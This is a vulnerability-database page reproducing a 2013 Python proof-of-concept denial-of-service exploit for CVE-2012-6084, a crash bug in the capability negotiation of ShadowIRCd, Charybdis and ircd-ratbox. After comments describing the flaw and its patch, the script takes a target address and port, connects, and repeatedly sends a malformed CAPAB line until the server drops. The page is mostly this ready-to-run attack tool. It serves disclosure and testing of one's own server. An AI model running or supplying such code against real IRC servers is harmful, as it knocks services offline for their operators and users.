Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

Ratbox IRCd Denial Of Service

Related Vulnerabilities: CVE-2012-6084  
Publish Date: 04 Jan 2013
Author: Aph3x, UberLame, O_O, Apetrick, zempirians.com
Source 
                							

                #!/usr/bin/python3
###################################################################################
#
#      _  _  .__                .__               
#   __| || |_|  |   ____   ____ |__| ____   ____  
#   \   __   /  | _/ __ \ / ___\|  |/  _ \ /    \ 
#    |  ||  ||  |_\  ___// /_/  >  (  <_> )   |  \        http://www.zempirians.com
#   /_  ~~  _\____/\___  >___  /|__|\____/|___|  /
#     |_||_|           \/_____/                \/
#
#   00100011 01101100 01100101 01100111 01101001 01101111 01101110
#
#   Provided by: UberLame, Aph3x, Apetrick, O_O
#
###################################################################################
#
#             -=[ SHADOWIRCD 6.3.3 - Running vulnerable m_capab.c ] =-
#
#         [P]roof [o]f [C]oncept, Null Point Reference, Denial of Service
#
#
###################################################################################
# -=[ EXPLOIT ]=-
#
# Now that a patch has been secured we are releasing a proof of concept to test your
# ircd against this vulnerability. This exploit was designed to work against
# Shadowircd 6.3.3 running the following vulnerable code:
#
#  +VULNERABLE+
#       ../shadowircd/modules/m_capab.c - LINE(40)
#  {{mr_capab, 0}, mg_ignore, mg_ignore, mg_ignore, mg_ignore, mg_ignore}
#
# -=[ SUMMARY ]=-
#
# All versions of Charybdis are vulnerable to a remotely-triggered crash bug
# caused by code originating from ircd-ratbox 2.0.  (Incidentally, this means all
# versions since ircd-ratbox 2.0 are also vulnerable.)
# 
# The bug has to do with server capability negotiation.  A malformed request will
# trigger a crash due to invalid assumptions.
#
# -=[ PATCH ]=-
#
# January 1, 2013 - 12:55 PM GMT-6
# 
# Charybdis 3.4.2, ShadowIRCd 6.3.3 and Ratbox 3.0.8 have been released with an
# integrated patch to resolve this issue.  All admins should upgrade immediately.
#
# -=[ REFERENCE ]=-
#
# http://www.cvedetails.com/cve/CVE-2012-6084/
#
###################################################################################
# Ohai, I Can Has Moar Cycles? <33
#
# Eg: ./<file>.py -t <target> -p <port>
###################################################################################

from argparse import ArgumentParser
import socket


def own( uri, port ):
        sock = socket.socket()
        try:
                ret = sock.connect_ex(( uri, int( port ) ))
        except:
                print( "\t[-] Failed To Connect To {}".format( uri ) )
                exit()

        print( "\t[+] Connected, Sending Payload To {}:{}".format(  uri, port ) )
        while True:
                try:
                        sock.send(b"\x43\x41\x50\x41\x42\x20\x0d\x0a")
                except socket.error as se:
                        print( '\t[!] Owned <3' )
                        break

        sock.close()

if __name__ == '__main__':
        parser = ArgumentParser( description='m_capab DOS PoC, We Can Has Moar Cycles?' )

        parser.add_argument( '-t', '--target', dest='target', default='localhost', help='IRCD Address To Target' )
        parser.add_argument( '-p', '--port', dest='port', default=6667, help='IRCD Port To Target' )

        args = parser.parse_args()

        own( args.target, args.port )
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started